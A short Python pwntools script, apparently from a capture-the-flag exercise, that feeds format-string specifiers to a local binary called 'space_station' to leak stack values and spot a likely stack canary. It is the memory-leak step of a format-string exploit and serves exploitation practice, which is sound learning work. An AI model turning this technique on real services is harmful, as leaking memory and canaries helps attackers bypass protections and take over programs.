21 lines
472 B
Python
21 lines
472 B
Python
#!/usr/bin/env python3
|
|
from pwn import *
|
|
import re
|
|
|
|
elf = context.binary = ELF("./space_station", checksec=False)
|
|
|
|
#p = process(elf.path)
|
|
context.log_level='warn'
|
|
offset = 0x139e
|
|
for i in range(35):
|
|
p = process(elf.path)
|
|
p.recvline()
|
|
p.sendline(f"%{i}$lx")
|
|
val = p.recvline().split(b":")[1].strip()
|
|
print(f"Pos:{i} Value: {val}")
|
|
if( val[-2:] == b"00"):
|
|
print(f"Possible canary: {val} at position: {i}")
|
|
p.shutdown()
|
|
|
|
#p.interactive()
|